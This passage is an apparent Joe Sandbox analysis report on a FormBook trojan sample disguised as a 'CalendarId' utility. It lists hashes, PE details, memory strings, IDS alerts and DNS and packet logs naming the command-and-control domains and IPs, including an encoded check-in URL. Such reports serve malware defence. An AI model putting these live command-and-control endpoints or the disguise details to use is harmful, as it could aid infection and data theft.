                                http://www.sajatypeworks.comz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/cThez7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.661245659.0000000005B00000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnpz7d1ehQQQW.exe, 00000000.00000003.654997513.0000000005AFE000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/1z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/jp/fz7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/s-1z7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-user.htmlOz7d1ehQQQW.exe, 00000000.00000003.658881250.0000000005AFF000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designersdz7d1ehQQQW.exe, 00000000.00000003.657764912.0000000005AFE000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.carterandcone.comw.cz7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleasez7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.ascendercorp.com/typedesigners.htmlz7d1ehQQQW.exe, 00000000.00000003.656320601.0000000005AFE000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.dorotajedrusik.com/cmsr?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR%2F3kPtojHfoDwxQoDiPWi0%2FzmWdcscript.exe, 00000009.00000002.918829235.00000000052AF000.00000004.00020000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fonts.comz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleasez7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.dez7d1ehQQQW.exe, 00000000.00000003.660250458.0000000005B00000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sakkal.comz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.656667821.0000000005AFE000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersnz7d1ehQQQW.exe, 00000000.00000003.660082867.0000000005B00000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers2Iz7d1ehQQQW.exe, 00000000.00000003.660117823.0000000005B00000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.comz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.coz7d1ehQQQW.exe, 00000000.00000003.659128745.0000000005AFF000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Gz7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.urwpp.deFz7d1ehQQQW.exe, 00000000.00000003.657537776.0000000005AFE000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.carterandcone.comn-uLz7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tiro.comlicz7d1ehQQQW.exe, 00000000.00000003.655730815.0000000005B00000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.carterandcone.comCez7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.carterandcone.comtz7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/jp/z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.carterandcone.comlz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cnz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/frere-user.htmlz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658933536.0000000005AFF000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designers/cabarga.htmlz7d1ehQQQW.exe, 00000000.00000003.659434113.0000000005B00000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.monotype.z7d1ehQQQW.exe, 00000000.00000003.657056723.0000000005AFE000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/iz7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers8z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658933536.0000000005AFF000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designersMF5z7d1ehQQQW.exe, 00000000.00000003.657764912.0000000005AFE000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.jiyu-kobo.co.jp/fz7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.tiro.com0Kz7d1ehQQQW.exe, 00000000.00000003.655730815.0000000005B00000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/z7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmpfalse
                                                          		high

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          35.246.6.109
                                                          		td-balancer-euw2-6-109.wixdns.netUnited States
                                                          		15169GOOGLEUSfalse
                                                          34.102.136.180
                                                          		noseainsight.comUnited States
                                                          		15169GOOGLEUSfalse

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:491384
                                                          Start date:27.09.2021
                                                          Start time:14:35:54
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 12m 14s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:z7d1ehQQQW.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:20
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@7/1@3/2
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 47.4% (good quality ratio 42.1%)
                                                          • Quality average: 73.3%
                                                          • Quality standard deviation: 32.4%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                          • Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.82.209.104, 20.54.110.249, 23.0.174.185, 23.0.174.200, 40.112.88.60, 23.10.249.26, 23.10.249.43, 20.50.102.62
                                                          • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, download.windowsupdate.com.edgesuite.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          14:36:54API Interceptor2x Sleep call for process: z7d1ehQQQW.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASN

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z7d1ehQQQW.exe.log
                                                          Process:C:\Users\user\Desktop\z7d1ehQQQW.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.355304211458859
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                          Malicious:true
                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.6030295284828995
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:z7d1ehQQQW.exe
                                                          File size:685568
                                                          MD5:50568fb6133ee4ed721ee46a3c0a9e98
                                                          SHA1:4897b6f2141395071652f72d34dc3d39eb014a56
                                                          SHA256:2b1a98add215568bb5e1c333321cf0ffe98d9128fa149c4f5a07ce2922750b3e
                                                          SHA512:d5facfcf30e3e9f815f595c3af6992551d623a5592c13e7ae8df4e29e7f6401523339bf5a7835d46c80b998fdc3338530ea677f85a08c4fe16829a83879f529f
                                                          SSDEEP:12288:+11lXTqv/Q7zgVAhTQ4HzW0Ikfda+pv0va7bjndt:qDbsVdu5ID+90vMbjd
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0..j............... ........@.. ....................................@................................

                                                          File Icon

                                                          Icon Hash:00828e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4a88ee
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x61518DCF [Mon Sep 27 09:24:31 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:v4.0.30319
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [ecx], al
                                                          add al, byte ptr [ebx]
                                                          add al, 05h
                                                          push es
                                                          pop es
                                                          or byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa889c0x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xaa0000x660.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000xa69040xa6a00False0.752005872562data7.61448564553IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xaa0000x6600x800False0.34375data3.56461831417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0xac0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_VERSION0xaa0900x3cedata
                                                          RT_MANIFEST0xaa4700x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Version Infos

                                                          DescriptionData
                                                          Translation0x0000 0x04b0
                                                          LegalCopyrightBest Products All rights reserved
                                                          Assembly Version253.13.3.4
                                                          InternalNameFileBasedResourceGrovel.exe
                                                          FileVersion253.13.2.1
                                                          CompanyNameBest Products
                                                          LegalTrademarks
                                                          CommentsCalendar ID Sorter
                                                          ProductNameCalendarId
                                                          ProductVersion253.13.2.1
                                                          FileDescriptionCalendarId
                                                          OriginalFilenameFileBasedResourceGrovel.exe

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          09/27/21-14:38:10.694045TCP1201ATTACK-RESPONSES 403 Forbidden804982134.102.136.180192.168.2.4
                                                          09/27/21-14:38:33.068380TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.435.246.6.109
                                                          09/27/21-14:38:33.068380TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.435.246.6.109
                                                          09/27/21-14:38:33.068380TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.435.246.6.109
                                                          09/27/21-14:38:53.983274TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985280192.168.2.447.91.170.222
                                                          09/27/21-14:38:53.983274TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985280192.168.2.447.91.170.222
                                                          09/27/21-14:38:53.983274TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985280192.168.2.447.91.170.222

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 27, 2021 14:38:10.566497087 CEST4982180192.168.2.434.102.136.180
                                                          Sep 27, 2021 14:38:10.578932047 CEST804982134.102.136.180192.168.2.4
                                                          Sep 27, 2021 14:38:10.579289913 CEST4982180192.168.2.434.102.136.180
                                                          Sep 27, 2021 14:38:10.579485893 CEST4982180192.168.2.434.102.136.180
                                                          Sep 27, 2021 14:38:10.592395067 CEST804982134.102.136.180192.168.2.4
                                                          Sep 27, 2021 14:38:10.694045067 CEST804982134.102.136.180192.168.2.4
                                                          Sep 27, 2021 14:38:10.694066048 CEST804982134.102.136.180192.168.2.4
                                                          Sep 27, 2021 14:38:10.694550037 CEST4982180192.168.2.434.102.136.180
                                                          Sep 27, 2021 14:38:10.694581985 CEST4982180192.168.2.434.102.136.180
                                                          Sep 27, 2021 14:38:10.707451105 CEST804982134.102.136.180192.168.2.4
                                                          Sep 27, 2021 14:38:33.035368919 CEST4982280192.168.2.435.246.6.109
                                                          Sep 27, 2021 14:38:33.068085909 CEST804982235.246.6.109192.168.2.4
                                                          Sep 27, 2021 14:38:33.068351030 CEST4982280192.168.2.435.246.6.109
                                                          Sep 27, 2021 14:38:33.068380117 CEST4982280192.168.2.435.246.6.109
                                                          Sep 27, 2021 14:38:33.100491047 CEST804982235.246.6.109192.168.2.4
                                                          Sep 27, 2021 14:38:33.161304951 CEST804982235.246.6.109192.168.2.4
                                                          Sep 27, 2021 14:38:33.161334038 CEST804982235.246.6.109192.168.2.4
                                                          Sep 27, 2021 14:38:33.161528111 CEST4982280192.168.2.435.246.6.109
                                                          Sep 27, 2021 14:38:33.161612034 CEST4982280192.168.2.435.246.6.109
                                                          Sep 27, 2021 14:38:33.195811033 CEST804982235.246.6.109192.168.2.4

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 27, 2021 14:36:40.136929035 CEST5802853192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:36:40.156522036 CEST53580288.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:11.329107046 CEST5309753192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:11.356400013 CEST53530978.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:30.264050007 CEST4925753192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:30.278074980 CEST53492578.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:30.835949898 CEST6238953192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:30.849351883 CEST53623898.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:31.351696968 CEST4991053192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:31.370544910 CEST53499108.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:31.928380966 CEST5585453192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:31.995811939 CEST53558548.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:33.098720074 CEST6454953192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:33.111721992 CEST53645498.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:36.748505116 CEST6315353192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:36.783879042 CEST53631538.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:37.221718073 CEST5299153192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:37.234687090 CEST53529918.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:37.997941971 CEST5370053192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:38.012214899 CEST53537008.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:39.414196014 CEST5172653192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:39.427916050 CEST53517268.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:40.775157928 CEST5679453192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:40.848000050 CEST53567948.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:42.119669914 CEST5653453192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:42.132577896 CEST53565348.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:42.506829023 CEST5662753192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:42.520287037 CEST53566278.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:37:59.524534941 CEST5662153192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:37:59.546118021 CEST53566218.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:38:10.523931026 CEST6311653192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:38:10.554481983 CEST53631168.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:38:32.964072943 CEST6407853192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:38:33.026504993 CEST53640788.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:38:34.101455927 CEST6480153192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:38:34.143057108 CEST53648018.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:38:35.062074900 CEST6172153192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:38:35.075623035 CEST53617218.8.8.8192.168.2.4
                                                          Sep 27, 2021 14:38:53.311139107 CEST5125553192.168.2.48.8.8.8
                                                          Sep 27, 2021 14:38:53.792260885 CEST53512558.8.8.8192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                          Sep 27, 2021 14:38:10.523931026 CEST192.168.2.48.8.8.80x9a2fStandard query (0)www.noseainsight.comA (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:38:32.964072943 CEST192.168.2.48.8.8.80xb0aeStandard query (0)www.dorotajedrusik.comA (IP address)IN (0x0001)
                                                          Sep 27, 2021 14:38:53.311139107 CEST192.168.2.48.8.8.80x3b62Standard query (0)www.healthyweathorganics.comA (IP address)IN (0x0001)

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
